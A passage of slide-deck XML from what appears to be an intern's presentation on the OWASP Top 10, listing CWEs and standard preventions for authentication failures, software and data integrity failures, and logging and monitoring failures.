            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-294 Authentication Bypass by Capture-replay</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-295 Improper Certificate Validation</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-297 Improper Validation of Certificate with Host Mismatch</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-300 Channel Accessible by Non-Endpoint</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-302 Authentication Bypass by Assumed-Immutable Data</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-304 Missing Critical Step in Authentication</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-306 Missing Authentication for Critical Function</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-307 Improper Restriction of Excessive Authentication Attempts</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-346 Origin Validation Error</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-384 Session Fixation</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-521 Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-613 Insufficient Session Expiration</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-620 Unverified Password Change</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-640 Weak Password Recovery Mechanism for Forgotten Password</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-798 Use of Hard-coded Credentials</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-940 Improper Verification of Source of a Communication Channel</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-1216 Lockout Mechanism Errors</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p31"/>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Where possible, implement multi-factor authentication to prevent automated credential stuffing, brute force, and stolen credential reuse attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Do not ship or deploy with any default credentials, particularly for admin users.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Implement weak password checks, such as testing new or changed passwords against the top 10,000 worst passwords list.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Align password length, complexity, and rotation policies with National Institute of Standards and Technology (NIST) 800-63b's guidelines in section 5.1.1 for Memorized Secrets or other modern, evidence-based password policies.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks by using the same messages for all outcomes.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Limit or increasingly delay failed login attempts, but be careful not to create a denial of service scenario. Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Use a server-side, secure, built-in session manager that generates a new random session ID with high entropy after login. Session identifier should not be in the URL, be securely stored, and invalidated after logout, idle, and absolute timeouts.</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Week 1: Induction and created summaries for OWASP Top 10.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Week 2: Started testing/hacking on Metasploitable and DVWA.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Week 3: Building the initial presentation for week 4 and began testing on Hacker101. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Week 4: Wrote vulnerability reports for the best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> report examples I had found, continued testing on Hacker101, and presenting my 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Software and Data Integrity Failures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207" name="Google Shape;207;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4320300" cy="37998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Software and data integrity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> relate to code and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> that does not protect against integrity violations.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This can be occur when an application relies on plugins, libraries, or modules from untrusted sources, repositories, or content deliverable networks (CDNs). </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nsecure CI/CD pipeline can introduce the potential for unauthorized access, malicious code, or system compromise. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Many applications include an auto-update feature that can be exploited by attacker if they compromise a trusted source. Attackers can upload their own malicious updates to the trusted source and their malicious update will be instantly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to all the applications running the auto-update feature.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Some sites show hashes of their software for users to check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> of their download.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p32"/>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8</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="209" name="Google Shape;209;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724550" y="1534838"/>
            <a:ext cx="4419450" cy="265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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Software and Data Integrity Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2220"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p33"/>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CWE-345 Insufficient Verification of Data Authenticity</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-353 Missing Support for Integrity Check</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-426 Untrusted Search Path</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-494 Download of Code Without Integrity Check</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-502 Deserialization of Untrusted Data</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-565 Reliance on Cookies without Validation and Integrity Checking</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-784 Reliance on Cookies without Validation and Integrity Checking in a Security Decision</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-829 Inclusion of Functionality from Untrusted Control Sphere</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-830 Inclusion of Web Functionality from an Untrusted Source</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-915 Improperly Controlled Modification of Dynamically-Determined Object Attributes</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p33"/>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Use digital signatures or similar mechanisms to verify the software or data is from the expected source and has not been altered.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure libraries and dependencies, such as npm or Maven, are consuming trusted repositories. If you have a higher risk profile, consider hosting an internal known-good repository that's vetted.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure that a software supply chain security tool, such as OWASP Dependency Check or OWASP CycloneDX, is used to verify that components do not contain known vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure that there is a review process for code and configuration changes to minimize the chance that malicious code or configuration could be introduced into your software pipeline.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure that your CI/CD pipeline has proper segregation, configuration, and access control to ensure the integrity of the code flowing through the build and deploy processes.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure that unsigned or unencrypted serialized data is not sent to untrusted clients without some form of integrity check or digital signature to detect tampering or replay of the serialized data</a:t>
            </a:r>
            <a:endParaRPr sz="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3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3646633"/>
            <a:ext cx="4571999" cy="1496867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;22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Security Logging and Monitoring Failures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223" name="Google Shape;223;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1266325"/>
            <a:ext cx="8520600" cy="304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Security logging and monitoring is important to help detect, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>escalate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, and respond to active breaches. If there is a failure in the logging and monitoring systems a breach will not be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>detected. Attackers can then further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Many data breaches are detected over 200 days after the breach has occurred and these breaches are typically detected by external parties who perform security tests on the system, rather than the internal monitoring system.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p34"/>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9</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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Security Logging and Monitoring Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2220"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p35"/>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CWE-117 Improper Output Neutralization for Logs</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-223 Omission of Security-relevant Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-532 Insertion of Sensitive Information into Log File</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
